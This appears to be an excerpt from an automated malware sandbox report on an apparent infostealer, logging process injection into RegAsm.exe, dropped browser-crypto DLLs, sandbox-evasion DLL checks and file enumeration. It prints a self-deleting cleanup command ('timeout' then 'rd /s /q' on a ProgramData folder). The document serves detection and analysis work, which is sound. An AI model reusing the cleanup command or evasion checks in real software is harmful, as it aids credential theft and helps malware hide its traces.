                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KFBFCAFCBKFI" & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KFBFCAFCBKFI" & exitJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2020,i,13904423073980638453,1715731274265844286,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2020,i,13904423073980638453,1715731274265844286,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1960,i,9720651213267638284,544210953920903557,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dlnashext.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wpdshext.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: mozglue.pdbP source: mozglue.dll.1.dr, mozglue[1].dll.1.dr
                  Source: Binary string: freebl3.pdb source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                  Source: Binary string: freebl3.pdbp source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                  Source: Binary string: nss3.pdb@ source: nss3.dll.1.dr, nss3[1].dll.1.dr
                  Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
                  Source: Binary string: nss3.pdb source: nss3.dll.1.dr, nss3[1].dll.1.dr
                  Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000001.00000002.2111941345.0000000013AC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmp, sqlx[1].dll.1.dr
                  Source: Binary string: mozglue.pdb source: mozglue.dll.1.dr, mozglue[1].dll.1.dr
                  Source: Binary string: softokn3.pdb source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041608F GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_0041608F
                  Source: file.exeStatic PE information: section name: .Shine
                  Source: sqlx[1].dll.1.drStatic PE information: section name: .00cfg
                  Source: freebl3.dll.1.drStatic PE information: section name: .00cfg
                  Source: freebl3[1].dll.1.drStatic PE information: section name: .00cfg
                  Source: mozglue.dll.1.drStatic PE information: section name: .00cfg
                  Source: mozglue[1].dll.1.drStatic PE information: section name: .00cfg
                  Source: msvcp140.dll.1.drStatic PE information: section name: .didat
                  Source: msvcp140[1].dll.1.drStatic PE information: section name: .didat
                  Source: nss3.dll.1.drStatic PE information: section name: .00cfg
                  Source: nss3[1].dll.1.drStatic PE information: section name: .00cfg
                  Source: softokn3.dll.1.drStatic PE information: section name: .00cfg
                  Source: softokn3[1].dll.1.drStatic PE information: section name: .00cfg
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A420B5 push ecx; ret 0_2_00A420C8
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A06A80 push ecx; ret 0_2_00A06A93
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00417CB5 push ecx; ret 1_2_00417CC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19821BF9 push ecx; ret 1_2_199C4C03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_198210C8 push ecx; ret 1_2_19A23552
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\KFBFCAFCBKFI\freebl3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\KFBFCAFCBKFI\msvcp140.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\KFBFCAFCBKFI\vcruntime140.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\KFBFCAFCBKFI\mozglue.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\KFBFCAFCBKFI\softokn3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\KFBFCAFCBKFI\nss3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\KFBFCAFCBKFI\freebl3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\KFBFCAFCBKFI\msvcp140.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\KFBFCAFCBKFI\vcruntime140.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\KFBFCAFCBKFI\mozglue.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\KFBFCAFCBKFI\softokn3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\KFBFCAFCBKFI\nss3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041608F GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_0041608F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7440, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeEvasive API call chain: GetComputerName,DecisionNodes,Sleepgraph_1-79008
                  Source: file.exe, RegAsm.exeBinary or memory string: DIR_WATCH.DLL
                  Source: file.exe, RegAsm.exeBinary or memory string: SBIEDLL.DLL
                  Source: file.exe, RegAsm.exeBinary or memory string: API_LOG.DLL
                  Source: RegAsm.exe, 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\KFBFCAFCBKFI\freebl3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\KFBFCAFCBKFI\msvcp140.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\KFBFCAFCBKFI\softokn3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\KFBFCAFCBKFI\nss3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\file.exeAPI coverage: 9.2 %
                  Source: C:\Windows\SysWOW64\timeout.exe TID: 9076Thread sleep count: 81 > 30Jump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040E76B GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 0040E87Eh1_2_0040E76B
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A17331 FindFirstFileExW,0_2_00A17331
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004011D9 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,1_2_004011D9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004145BC _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_004145BC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00414CC7 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00414CC7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040BDAF _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040BDAF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00409E01 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_00409E01
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00413F80 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,1_2_00413F80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004093C1 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_004093C1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004097DC _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_004097DC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00414960 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_00414960
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041433D _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,1_2_0041433D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040E907 GetSystemInfo,wsprintfA,1_2_0040E907
